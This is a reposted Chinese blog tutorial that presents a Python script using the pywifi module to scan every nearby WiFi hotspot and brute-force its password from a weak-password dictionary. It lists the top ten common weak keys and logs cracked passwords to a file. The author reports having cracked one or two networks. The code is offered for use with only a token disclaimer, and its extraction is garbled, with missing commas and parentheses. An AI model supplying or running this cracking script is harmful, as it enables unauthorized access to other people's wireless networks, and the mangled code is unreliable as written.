Quantcast
Channel: CodeSection,代码区,Python开发技术文章_教程 - CodeSec
Viewing all articles
Browse latest Browse all 9596

WiFi密码怎么破?一个Python脚本搞定

$
0
0
WiFi密码怎么破?一个python脚本搞定

一点号编程派6小时前

「短暂」的春节假期已经结束了,想必今天大家都已经开工了。新的一年,一起继续学习 Python,鸡年雄起~~

本文仅供大家参考,不要滥用哦。

原文:https://my.oschina.net/Apathy/blog/821039

环境准备

python 2.7

凑合的 linux

差不多的无线网卡

pywifi模块

弱口令字典

清除系统中的任何 wifi 连接记录 \ (非常重要 \ ! \ ! \ ! \ )

首先,这个模块在 win 下有点鸡肋,作者在调用 WLANAPI 时没有做好 WLANSECURITYATTRIBUTES 的封装,所以推荐在 linux 下跑,我测试所使用的是 Kali 2.0 自带 python 2.7.6 ,可直接通过 pip install pywifi 安装。

导入模块

这里用的模块就这三个。pywifi 的 wifiutillinux.py 脚本的 sendcmdtowpas 方法中的 if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。

frompywifiimport*

importtime

importsys

字典准备

效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的 wifi 弱口令 TOP 10:

12345678

123456789

88888888

1234567890

00000000

87654321

66668888

11223344

147258369

11111111

配置扫描器

推荐扫描时常可以设置在15-20秒之间。测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义。到时候就算破解成功的热点,信号也好不到哪里

defmain:

#扫描时常

scantimes=3

#单个密码测试延迟

testtimes=15

output=sys.stdout

#结果文件保存路径

files="TestRes.txt"

#字典列表

keys=open(sys.argv[1],"r").readlines

print"|KEYS %s"%(len(keys))

#实例化一个pywifi对象

wifi=PyWiFi

#选择定一个网卡并赋值于iface

iface=wifi.interfaces[0]

#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置

scanres=scans(ifacescantimes)

#统计附近被发现的热点数量

nums=len(scanres)

print"|SCAN GET %s"%(nums)

print"%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*706"WIFIID"18"SSID OR BSSID"2"N"4"time"7"signal"10"KEYNUM"10"KEY""="*70)

#将每一个热点信息逐一进行测试

forixinenumerate(scanres):

#测试完毕后,成功的结果讲存储到files中

res=test(nums-iifacexkeysoutputtesttimes)

ifres:

open(files"a").write(res)

扫描周围热点

defscans(facetimeout):

#开始扫描

face.scan

time.sleep(timeout)

#在若干秒后获取扫描结果

returnface.scan_results

热点测试

这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。

deftest(ifacexkeystuts):

#显示对应网络名称,考虑到部分中文名啧显示bssid

showID=x.bssidiflen(x.ssid)>len(x.bssid)elsex.ssid

#迭代字典并进行爆破

fornkinenumerate(key):

x.key=k.strip

#移除所有热点配置

face.remove_all_network_profiles

#讲封装好的目标尝试连接

face.connect(face.add_network_profile(x))

#初始化状态码,考虑到用0会发生些逻辑错误

code=10

t1=time.time

#循环刷新状态,如果置为0则密码错误,如超时则进行下一个

whilecode!=0:

time.sleep(0.1)

code=face.status

now=time.time-t1

ifnowts:

break

stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6i18showIDcode5now7x.signal10len(key)-n10k.replace("\n""")))

stu.flush

ifcode==4:

face.disconnect

return"%-*s| %s | %*s |%*s\n"%(20x.ssidx.bssid3x.signal15k)

returnFalse

案例

这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了

_ * WIFIID * _ 热点的 id 号 每跑一个会减1

_ * SSID OR BSSID * _ 热点的 ssid 名或 mac 地址

_ * N * _ 对热点的连接状态,这个在

* _time_ * 当前所花去的时间

* _signal_ * 热点的信号强度,若小越好

* _KEYNUM_ * 测试密码的 id 每跑一个会减1

* _KEY_ * 当前测试的密码


php?url=0Fa6NCxxhH" alt="WiFi密码怎么破?一个Python脚本搞定" />

结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -

传送门

后台回复关键词 wifi,即可获取相关字典、源码和模块的分享链接。

题图:pexels,CC0 授权。


Viewing all articles
Browse latest Browse all 9596

Trending Articles